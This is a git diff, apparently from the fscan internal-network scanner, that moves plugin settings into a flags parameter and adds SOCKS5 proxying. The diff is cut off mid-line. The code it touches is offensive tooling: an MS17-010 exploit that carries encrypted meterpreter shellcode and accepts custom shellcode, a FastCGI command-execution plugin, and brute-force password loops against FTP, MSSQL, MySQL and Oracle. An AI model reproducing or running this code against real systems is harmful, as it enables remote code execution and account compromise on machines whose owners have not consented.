diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go index d8bc772..5eb7cb0 100644 --- a/Plugins/CVE-2020-0796.go +++ b/Plugins/CVE-2020-0796.go @@ -94,18 +94,18 @@ const ( "\x00\x00\x00\x00" ) -func SmbGhost(info *common.HostInfo) error { - if common.IsBrute { +func SmbGhost(info common.HostInfo, flags common.Flags) error { + if flags.IsBrute { return nil } - err := SmbGhostScan(info) + err := SmbGhostScan(info, flags) return err } -func SmbGhostScan(info *common.HostInfo) error { - ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second +func SmbGhostScan(info common.HostInfo, flags common.Flags) error { + ip, port, timeout := info.Host, 445, time.Duration(flags.Timeout)*time.Second addr := fmt.Sprintf("%s:%v", info.Host, port) - conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout) + conn, err := common.WrapperTcpWithTimeout("tcp", addr, common.Socks5{Address: flags.Socks5Proxy}, timeout) defer func() { if conn != nil { conn.Close() diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go index 5dfef12..2ed7f7f 100644 --- a/Plugins/NetBIOS.go +++ b/Plugins/NetBIOS.go @@ -4,18 +4,19 @@ import ( "bytes" "errors" "fmt" - "github.com/shadow1ng/fscan/common" - "gopkg.in/yaml.v3" "net" "strconv" "strings" "time" + + "github.com/shadow1ng/fscan/common" + "gopkg.in/yaml.v3" ) var errNetBIOS = errors.New("netbios error") -func NetBIOS(info *common.HostInfo) error { - netbios, _ := NetBIOS1(info) +func NetBIOS(info common.HostInfo, flags common.Flags) error { + netbios, _ := NetBIOS1(info, flags) output := netbios.String() if len(output) > 0 { result := fmt.Sprintf("[*] NetBios: %-15s %s ", info.Host, output) @@ -25,8 +26,8 @@ func NetBIOS(info *common.HostInfo) error { return errNetBIOS } -func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) { - netbios, err = GetNbnsname(info) +func NetBIOS1(info common.HostInfo, flags common.Flags) (netbios NetBiosInfo, err error) { + netbios, err = GetNbnsname(info, flags.Timeout) var payload0 []byte if netbios.ServerService != "" || netbios.WorkstationService != "" { ss := netbios.ServerService @@ -40,7 +41,7 @@ func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) { } realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) var conn net.Conn - conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err = common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -49,7 +50,7 @@ func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) { if err != nil { return } - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { return } @@ -88,11 +89,11 @@ func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) { return } -func GetNbnsname(info *common.HostInfo) (netbios NetBiosInfo, err error) { +func GetNbnsname(info common.HostInfo, timeout int64) (netbios NetBiosInfo, err error) { senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1} //senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01") realhost := fmt.Sprintf("%s:137", info.Host) - conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := net.DialTimeout("udp", realhost, time.Duration(timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -101,7 +102,7 @@ func GetNbnsname(info *common.HostInfo) (netbios NetBiosInfo, err error) { if err != nil { return } - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(timeout) * time.Second)) if err != nil { return } @@ -208,7 +209,7 @@ type NetBiosInfo struct { NetComputerName string `yaml:"NetBiosComputerName"` } -func (info *NetBiosInfo) String() (output string) { +func (info NetBiosInfo) String() (output string) { var text string //ComputerName 信息比较全 if info.ComputerName != "" { diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go index 1c95e5d..1dba1e8 100644 --- a/Plugins/fcgiscan.go +++ b/Plugins/fcgiscan.go @@ -19,22 +19,22 @@ import ( //https://xz.aliyun.com/t/9544 //https://github.com/wofeiwo/webcgi-exploits -func FcgiScan(info *common.HostInfo) { - if common.IsBrute { +func FcgiScan(info common.HostInfo, flags common.Flags) { + if flags.IsBrute { return } url := "/etc/issue" - if common.Path != "" { - url = common.Path + if flags.Path != "" { + url = flags.Path } addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) var reqParams string var cutLine = "-----ASDGTasdkk361363s-----\n" switch { - case common.Command == "read": + case flags.Command == "read": reqParams = "" - case common.Command != "": - reqParams = "" + case flags.Command != "": + reqParams = "" default: reqParams = "" } @@ -55,7 +55,7 @@ func FcgiScan(info *common.HostInfo) { env["REQUEST_METHOD"] = "GET" } - fcgi, err := New(addr, common.Timeout) + fcgi, err := New(addr, flags) defer func() { if fcgi.rwc != nil { fcgi.rwc.Close() @@ -183,8 +183,8 @@ type FCGIClient struct { keepAlive bool } -func New(addr string, timeout int64) (fcgi *FCGIClient, err error) { - conn, err := common.WrapperTcpWithTimeout("tcp", addr, time.Duration(timeout)*time.Second) +func New(addr string, flags common.Flags) (fcgi *FCGIClient, err error) { + conn, err := common.WrapperTcpWithTimeout("tcp", addr, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) fcgi = &FCGIClient{ rwc: conn, keepAlive: false, diff --git a/Plugins/findnet.go b/Plugins/findnet.go index 5c1e1b7..25a4a44 100644 --- a/Plugins/findnet.go +++ b/Plugins/findnet.go @@ -4,9 +4,10 @@ import ( "bytes" "encoding/hex" "fmt" - "github.com/shadow1ng/fscan/common" "strings" "time" + + "github.com/shadow1ng/fscan/common" ) var ( @@ -15,14 +16,14 @@ var ( bufferV3, _ = hex.DecodeString("0900ffff0000") ) -func Findnet(info *common.HostInfo) error { - err := FindnetScan(info) +func Findnet(info common.HostInfo, flags common.Flags) error { + err := FindnetScan(info, flags) return err } -func FindnetScan(info *common.HostInfo) error { +func FindnetScan(info common.HostInfo, flags common.Flags) error { realhost := fmt.Sprintf("%s:%v", info.Host, 135) - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -31,7 +32,7 @@ func FindnetScan(info *common.HostInfo) error { if err != nil { return err } - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { return err } diff --git a/Plugins/ftp.go b/Plugins/ftp.go index 2f84e61..429574f 100644 --- a/Plugins/ftp.go +++ b/Plugins/ftp.go @@ -2,18 +2,19 @@ package Plugins import ( "fmt" - "github.com/jlaffaye/ftp" - "github.com/shadow1ng/fscan/common" "strings" "time" + + "github.com/jlaffaye/ftp" + "github.com/shadow1ng/fscan/common" ) -func FtpScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func FtpScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() - flag, err := FtpConn(info, "anonymous", "") + flag, err := FtpConn(info, "anonymous", "", flags.Timeout) if flag && err == nil { return err } else { @@ -28,7 +29,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) { for _, user := range common.Userdict["ftp"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := FtpConn(info, user, pass) + flag, err := FtpConn(info, user, pass, flags.Timeout) if flag && err == nil { return err } else { @@ -38,7 +39,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -47,10 +48,10 @@ func FtpScan(info *common.HostInfo) (tmperr error) { return tmperr } -func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func FtpConn(info common.HostInfo, user string, pass string, timeout int64) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - conn, err := ftp.Dial(fmt.Sprintf("%v:%v", Host, Port), ftp.DialWithTimeout(time.Duration(common.Timeout)*time.Second)) + conn, err := ftp.Dial(fmt.Sprintf("%v:%v", Host, Port), ftp.DialWithTimeout(time.Duration(timeout)*time.Second)) if err == nil { err = conn.Login(Username, Password) if err == nil { diff --git a/Plugins/icmp.go b/Plugins/icmp.go index 8e08a56..afe021d 100644 --- a/Plugins/icmp.go +++ b/Plugins/icmp.go @@ -21,14 +21,14 @@ var ( livewg sync.WaitGroup ) -func CheckLive(hostslist []string, Ping bool) []string { +func CheckLive(hostslist []string, ping bool, liveTop int) []string { chanHosts := make(chan string, len(hostslist)) go func() { for ip := range chanHosts { if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) { ExistHosts[ip] = struct{}{} if !common.Silent { - if !Ping { + if !ping { fmt.Printf("(icmp) Target %-15s is alive\n", ip) } else { fmt.Printf("(ping) Target %-15s is alive\n", ip) @@ -40,7 +40,7 @@ func CheckLive(hostslist []string, Ping bool) []string { } }() - if Ping { + if ping { // use ping detection RunPing(hostslist, chanHosts) } else { @@ -74,14 +74,14 @@ func CheckLive(hostslist []string, Ping bool) []string { close(chanHosts) if len(hostslist) > 1000 { - arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true) + arrTop, arrLen := ArrayCountValueTop(AliveHosts, liveTop, true) for i := 0; i < len(arrTop); i++ { output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i]) common.LogSuccess(output) } } if len(hostslist) > 256 { - arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false) + arrTop, arrLen := ArrayCountValueTop(AliveHosts, liveTop, false) for i := 0; i < len(arrTop); i++ { output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i]) common.LogSuccess(output) diff --git a/Plugins/memcached.go b/Plugins/memcached.go index 361edc1..e9a8e30 100644 --- a/Plugins/memcached.go +++ b/Plugins/memcached.go @@ -2,21 +2,22 @@ package Plugins import ( "fmt" - "github.com/shadow1ng/fscan/common" "strings" "time" + + "github.com/shadow1ng/fscan/common" ) -func MemcachedScan(info *common.HostInfo) (err error) { +func MemcachedScan(info common.HostInfo, flags common.Flags) (err error) { realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) - client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + client, err := common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if client != nil { client.Close() } }() if err == nil { - err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = client.SetDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err == nil { _, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten if err == nil { diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go index cc81424..6ee891f 100644 --- a/Plugins/mongodb.go +++ b/Plugins/mongodb.go @@ -2,16 +2,17 @@ package Plugins import ( "fmt" - "github.com/shadow1ng/fscan/common" "strings" "time" + + "github.com/shadow1ng/fscan/common" ) -func MongodbScan(info *common.HostInfo) error { - if common.IsBrute { +func MongodbScan(info common.HostInfo, flags common.Flags) error { + if flags.IsBrute { return nil } - _, err := MongodbUnauth(info) + _, err := MongodbUnauth(info, flags) if err != nil { errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err) common.LogError(errlog) @@ -19,7 +20,7 @@ func MongodbScan(info *common.HostInfo) error { return err } -func MongodbUnauth(info *common.HostInfo) (flag bool, err error) { +func MongodbUnauth(info common.HostInfo, flags common.Flags) (flag bool, err error) { flag = false // op_msg packet1 := []byte{ @@ -48,7 +49,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) { realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) checkUnAuth := func(address string, packet []byte) (string, error) { - conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", realhost, common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) if err != nil { return "", err } @@ -57,7 +58,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) { conn.Close() } }() - err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetReadDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { return "", err } diff --git a/Plugins/ms17010-exp.go b/Plugins/ms17010-exp.go index 5309671..cfa4c90 100644 --- a/Plugins/ms17010-exp.go +++ b/Plugins/ms17010-exp.go @@ -14,10 +14,10 @@ import ( "github.com/shadow1ng/fscan/common" ) -func MS17010EXP(info *common.HostInfo) { +func MS17010EXP(info common.HostInfo, flags common.Flags) { address := info.Host + ":445" var sc string - switch common.SC { + switch flags.SC { case "bind": //msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK" @@ -34,16 +34,16 @@ func MS17010EXP(info *common.HostInfo) { sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx" sc = AesDecrypt(sc_enc, key) default: - if strings.Contains(common.SC, "file:") { - read, err := os.ReadFile(common.SC[5:]) + if strings.Contains(flags.SC, "file:") { + read, err := os.ReadFile(flags.SC[5:]) if err != nil { - errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", common.SC, err) + errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", flags.SC, err) common.LogError(errlog) return } sc = fmt.Sprintf("%x", read) } else { - sc = common.SC + sc = flags.SC } } diff --git a/Plugins/ms17010.go b/Plugins/ms17010.go index 0bf5bca..f898b94 100644 --- a/Plugins/ms17010.go +++ b/Plugins/ms17010.go @@ -5,9 +5,10 @@ import ( "encoding/hex" "errors" "fmt" - "github.com/shadow1ng/fscan/common" "strings" "time" + + "github.com/shadow1ng/fscan/common" ) var ( @@ -23,11 +24,11 @@ var ( trans2SessionSetupRequest, _ = hex.DecodeString(AesDecrypt(trans2SessionSetupRequest_enc, key)) ) -func MS17010(info *common.HostInfo) error { - if common.IsBrute { +func MS17010(info common.HostInfo, flags common.Flags) error { + if flags.IsBrute { return nil } - err := MS17010Scan(info) + err := MS17010Scan(info, flags) if err != nil { errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err) common.LogError(errlog) @@ -35,10 +36,10 @@ func MS17010(info *common.HostInfo) error { return err } -func MS17010Scan(info *common.HostInfo) error { +func MS17010Scan(info common.HostInfo, flags common.Flags) error { ip := info.Host // connecting to a host in LAN if reachable should be very quick - conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second) + conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", common.Socks5{Address: flags.Socks5Proxy}, time.Duration(flags.Timeout)*time.Second) defer func() { if conn != nil { conn.Close() @@ -48,7 +49,7 @@ func MS17010Scan(info *common.HostInfo) error { //fmt.Printf("failed to connect to %s\n", ip) return err } - err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) + err = conn.SetDeadline(time.Now().Add(time.Duration(flags.Timeout) * time.Second)) if err != nil { //fmt.Printf("failed to connect to %s\n", ip) return err @@ -137,8 +138,8 @@ func MS17010Scan(info *common.HostInfo) error { result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os) common.LogSuccess(result) defer func() { - if common.SC != "" { - MS17010EXP(info) + if flags.SC != "" { + MS17010EXP(info, flags) } }() // detect present of DOUBLEPULSAR SMB implant diff --git a/Plugins/mssql.go b/Plugins/mssql.go index db0bc55..45167f6 100644 --- a/Plugins/mssql.go +++ b/Plugins/mssql.go @@ -3,21 +3,22 @@ package Plugins import ( "database/sql" "fmt" - _ "github.com/denisenkom/go-mssqldb" - "github.com/shadow1ng/fscan/common" "strings" "time" + + _ "github.com/denisenkom/go-mssqldb" + "github.com/shadow1ng/fscan/common" ) -func MssqlScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func MssqlScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() for _, user := range common.Userdict["mssql"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := MssqlConn(info, user, pass) + flag, err := MssqlConn(info, user, pass, flags.Timeout) if flag && err == nil { return err } else { @@ -27,7 +28,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -36,14 +37,14 @@ func MssqlScan(info *common.HostInfo) (tmperr error) { return tmperr } -func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func MssqlConn(info common.HostInfo, user string, pass string, timeout int64) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second) + dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(timeout)*time.Second) db, err := sql.Open("mssql", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() diff --git a/Plugins/mysql.go b/Plugins/mysql.go index 2927323..b02a4b0 100644 --- a/Plugins/mysql.go +++ b/Plugins/mysql.go @@ -3,21 +3,22 @@ package Plugins import ( "database/sql" "fmt" - _ "github.com/go-sql-driver/mysql" - "github.com/shadow1ng/fscan/common" "strings" "time" + + _ "github.com/go-sql-driver/mysql" + "github.com/shadow1ng/fscan/common" ) -func MysqlScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func MysqlScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() for _, user := range common.Userdict["mysql"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := MysqlConn(info, user, pass) + flag, err := MysqlConn(info, user, pass, flags.Timeout) if flag && err == nil { return err } else { @@ -27,7 +28,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -36,14 +37,14 @@ func MysqlScan(info *common.HostInfo) (tmperr error) { return tmperr } -func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func MysqlConn(info common.HostInfo, user string, pass string, timeout int64) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass - dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second) + dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(timeout)*time.Second) db, err := sql.Open("mysql", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() diff --git a/Plugins/oracle.go b/Plugins/oracle.go index f40043f..526057d 100644 --- a/Plugins/oracle.go +++ b/Plugins/oracle.go @@ -3,21 +3,22 @@ package Plugins import ( "database/sql" "fmt" - "github.com/shadow1ng/fscan/common" - _ "github.com/sijms/go-ora/v2" "strings" "time" + + "github.com/shadow1ng/fscan/common" + _ "github.com/sijms/go-ora/v2" ) -func OracleScan(info *common.HostInfo) (tmperr error) { - if common.IsBrute { +func OracleScan(info common.HostInfo, flags common.Flags) (tmperr error) { + if flags.IsBrute { return } starttime := time.Now().Unix() for _, user := range common.Userdict["oracle"] { for _, pass := range common.Passwords { pass = strings.Replace(pass, "{user}", user, -1) - flag, err := OracleConn(info, user, pass) + flag, err := OracleConn(info, user, pass, flags.Timeout) if flag && err == nil { return err } else { @@ -27,7 +28,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) { if common.CheckErrs(err) { return err } - if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) { + if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * flags.Timeout) { return err } } @@ -36,14 +37,14 @@ func OracleScan(info *common.HostInfo) (tmperr error) { return tmperr } -func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err error) { +func OracleConn(info common.HostInfo, user string, pass string, timeout int64) (flag bool, err error) { flag = false Host, Port, Username, Password := info.Host, info.Ports, user, pass dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port) db, err := sql.Open("oracle", dataSourceName) if err == nil { - db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) - db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) + db.SetConnMaxLifetime(time.Duration(timeout) * time.Second) + db.SetConnMaxIdleTime(time.Duration(timeout) * time.Second) db.SetMaxIdleConns(0) defer db.Close() err = db.Ping() diff --git a/Plugins/portscan.go b/Plugins/portscan.go index 66fcf9c..6b1cd00 100644 --- a/Plugins/portscan.go +++ b/Plugins/portscan.go @@ -15,10 +15,10 @@ type Addr struct { port int } -func PortScan(hostslist []string, ports string, timeout int64) []string { +func PortScan(hostslist []string, ports string, flags common.Flags) []string { var AliveAddress []string probePorts := common.ParsePort(ports) - noPorts := common.ParsePort(common.NoPorts) + noPorts := common.ParsePort(flags.NoPorts) if len(noPorts) > 0 { temp := map[int]struct{}{} for _, port := range probePorts { @@ -36,7 +36,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { probePorts = newDatas sort.Ints(probePorts) } - workers := common.Threads + workers := flags.Threads Addrs := make(chan Addr, len(hostslist)*len(probePorts)) results := make(chan string, len(hostslist)*len(probePorts)) var wg sync.WaitGroup @@ -53,7 +53,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { for i := 0; i < workers; i++ { go func() { for addr := range Addrs { - PortConnect(addr, results, timeout, &wg) + PortConnect(addr, common.Socks5{Address: flags.Socks5Proxy}, results, flags.Timeout, &wg) wg.Done() } }() @@ -75,9 +75,9 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { return AliveAddress } -func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { +func PortConnect(addr Addr, socks5Proxy common.Socks5, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { host, port := addr.ip, addr.port - conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) + conn, err := 